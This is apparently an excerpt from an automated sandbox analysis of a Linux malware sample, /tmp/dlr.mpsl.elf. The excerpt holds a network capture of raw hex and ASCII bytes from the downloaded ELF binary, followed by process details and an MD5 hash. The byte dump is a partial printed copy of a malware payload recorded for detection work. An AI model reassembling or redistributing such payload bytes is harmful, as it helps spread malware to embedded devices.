00 [TRUNCATED]
        Data Ascii: ELF`@44 (@@EEH\Qtd<'!'<'! 9' <'!$j9' '<'!' "@Y B$ Y B$@$ $$" ('<'!'
        Dec 21, 2024 04:41:58.985050917 CET1236INData Raw: ac 81 99 8f 90 8c 84 24 05 00 40 10 d4 9a a5 24 09 f8 20 03 00 00 00 00 10 00 bc 8f 00 00 00 00 18 80 84 8f b8 81 99 8f 10 90 82 8c 00 00 00 00 06 00 40 10 10 90 84 24 04 00 20 13 00 00 00 00 18 00 bf 8f 08 00 20 03 20 00 bd 27 18 00 bf 8f 00 00
        Data Ascii: $@$ @$ ' '!<D'!!('$$'P <'!'0,($
        Dec 21, 2024 04:41:58.985088110 CET1236INData Raw: 44 00 b5 8f 40 00 b4 8f 3c 00 b3 8f 38 00 b2 8f 34 00 b1 8f 30 00 b0 8f 08 00 20 03 58 00 bd 27 00 00 42 82 00 00 00 00 1d 00 40 14 ff 00 56 30 24 00 a0 af 34 82 99 8f 00 00 00 00 09 f8 20 03 00 00 00 00 02 2a 15 00 00 ff a3 32 18 00 bc 8f 00 ff
        Data Ascii: D@<840 X'B@V0$4 *206&@%f% (% $ D0 !0\! $$&@&B$`P&+p@$$R
        Dec 21, 2024 04:41:58.985126019 CET1236INData Raw: 24 09 9c 27 21 e0 99 03 90 ff bd 27 6c 00 bf af 68 00 be af 64 00 b7 af 60 00 b6 af 5c 00 b5 af 58 00 b4 af 54 00 b3 af 50 00 b2 af 4c 00 b1 af 48 00 b0 af 18 00 bc af 5c 84 99 8f ff 00 92 30 74 00 a5 af 21 20 40 02 04 00 05 24 21 80 e0 00 09 f8
        Data Ascii: $'!'lhd`\XTPLH\0t! @$! 0! !($4 !@! !($4 T0C04bb0%b\! @ $@!@0@4t '!$
        Dec 21, 2024 04:41:58.985176086 CET1236INData Raw: 11 00 06 24 10 00 bc 8f ff ff 03 24 01 00 73 26 28 84 99 8f 21 20 40 00 18 00 a5 27 10 00 06 24 04 00 f7 26 56 00 43 10 00 00 42 ae 02 00 02 24 18 00 a2 a7 1a 00 be a7 09 f8 20 03 1c 00 a0 af 14 00 22 92 10 00 bc 8f 20 00 42 2c 78 83 99 8f d1 ff
        Data Ascii: $$s&(! @'$&VCB$ " B,x@!( 0 <$ 2&."%e%%!<$2&%D%%0D!( $R&t1&
        Dec 21, 2024 04:41:58.985208988 CET1236INData Raw: 01 00 31 26 10 00 bc 8f f5 ff 51 16 04 00 10 26 ee ff 40 1a 00 00 00 00 ee ff 00 10 00 00 00 00 09 f8 20 03 00 00 00 00 10 00 bc 8f a5 ff 00 10 02 00 22 a6 5c 00 bf 8f 58 00 be 8f 54 00 b7 8f 50 00 b6 8f 4c 00 b5 8f 48 00 b4 8f 44 00 b3 8f 40 00
        Data Ascii: 1&Q&@ "\XTPLHD@<8`'x B0o,!!!P! !(`!D!(!0`@$ &1&@<'!
        Dec 21, 2024 04:41:58.985244036 CET1236INData Raw: 00 00 00 00 09 f8 20 03 21 28 60 02 10 00 bc 8f 21 88 40 00 98 81 99 8f 00 00 00 00 09 f8 20 03 21 20 00 02 21 10 20 02 10 00 bc 8f 38 00 bf 8f 34 00 b3 8f 30 00 b2 8f 2c 00 b1 8f 28 00 b0 8f 08 00 e0 03 40 00 bd 27 06 00 1c 3c 80 fa 9c 27 21 e0
        Data Ascii: !(`!@ ! ! 840,(@'<'!p'|xtplh\0! $! 0! !($!8 (B0! !($4 XB0
        Dec 21, 2024 04:41:58.985362053 CET1236INData Raw: 00 00 00 00 71 00 50 11 00 00 00 00 cc 83 99 8f 40 00 a5 8f 09 f8 20 03 28 00 24 26 18 00 bc 8f 21 20 20 02 f4 82 99 8f 00 00 00 00 09 f8 20 03 14 00 05 24 18 00 bc 8f 21 20 20 02 c4 85 99 8f 0a 00 22 a6 21 28 40 02 21 30 e0 02 09 f8 20 03 10 00
        Data Ascii: qP@ ($&! $! "!(@!0 @CB$\c!0@$ &&s&xp <$ 2."f%e%%!
        Dec 21, 2024 04:41:58.985415936 CET1236INData Raw: ff ff 42 30 03 8e 11 00 64 01 a2 af b8 01 e0 1a 50 01 b1 af 54 01 a6 8f 64 01 a7 8f 28 00 c6 24 ff ff c2 30 ff 00 43 30 00 1a 03 00 02 12 02 00 25 10 43 00 a8 01 a2 af 58 01 a2 8f 28 00 a3 27 ff 00 42 30 01 00 44 32 a0 01 a6 af 94 01 a2 af ff 00
        Data Ascii: B0dPTd($0C0%CX('B0D20Xd2"2223+s28'H'$'LH|!$t$$ !0i^
        Dec 21, 2024 04:41:58.985456944 CET1236INData Raw: 00 00 00 00 60 00 a3 8f 64 00 a2 8f ff 00 04 3c 24 38 64 00 24 30 44 00 00 ff 65 30 00 ff 44 30 00 46 02 00 00 4e 03 00 02 3a 07 00 02 32 06 00 00 22 04 00 00 2a 05 00 02 16 02 00 02 1e 03 00 25 20 88 00 25 28 a9 00 25 18 67 00 25 10 46 00 5e 00
        Data Ascii: `d<$8d$0De0D0FN:2"*% %(%g%F^%e%DKFCJ B!@B$$F$@B4$$C\+ GB4$F"#'h&x'`!"%0&&
        Dec 21, 2024 04:41:59.105078936 CET1236INData Raw: 00 3a 07 00 00 52 0a 00 00 5a 0b 00 00 42 08 00 00 4a 09 00 00 62 0c 00 02 6a 17 00 02 12 02 00 02 2a 05 00 02 72 16 00 02 7a 15 00 02 1a 03 00 25 30 c4 00 25 38 ed 00 25 10 4a 00 25 28 ab 00 25 70 c8 01 25 78 e9 01 25 98 6c 00 21 80 00 00 3c 00
        Data Ascii: :RZBJbj*rz%0%8%J%(%p%x%l!<840,(" ,P$(C*SDh` \$ $\ ! \!dp$$$C@B4$DB


        System Behavior

        Start time (UTC):03:41:56
        Start date (UTC):21/12/2024
        Path:/tmp/dlr.mpsl.elf
        Arguments:/tmp/dlr.mpsl.elf
        File size:5773336 bytes
        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9